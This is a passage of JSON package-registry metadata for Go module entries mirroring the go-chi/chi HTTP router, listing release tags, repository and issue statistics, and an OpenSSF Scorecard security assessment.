v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.187Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":4.949816600657531,"dependent_packages_count":4.638193141632565,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.794004871145048},"purl":"pkg:golang/github.com/%21go-%21chi/chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Go-Chi/chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Go-Chi/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Go-Chi/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-Chi%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-Chi%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-Chi%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-Chi%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-Chi%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGo-Chi%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14709906,"name":"github.com/go-chI/chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chI/chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:14.216Z","created_at":"2026-07-03T10:37:10.924Z","updated_at":"2026-08-12T02:06:14.216Z","registry_url":"https://pkg.go.dev/github.com/go-chI/chi/v5","install_command":"go get github.com/go-chI/chi/v5","documentation_url":"https://pkg.go.dev/github.com/go-chI/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-08T10:51:33.564Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":4.926933158137311,"dependent_packages_count":4.616412160775715,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.771672659456513},"purl":"pkg:golang/github.com/go-ch%21i/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chI/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chI/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chI/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14709907,"name":"github.com/go-chI/chi","ecosystem":"go","description":"","homepage":"https://github.com/go-chI/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chI/chi","keywords_array":[],"namespace":"github.com/go-chI","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:14.432Z","created_at":"2026-07-03T10:37:11.778Z","updated_at":"2026-08-12T02:06:14.432Z","registry_url":"https://pkg.go.dev/github.com/go-chI/chi","install_command":"go get github.com/go-chI/chi","documentation_url":"https://pkg.go.dev/github.com/go-chI/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"age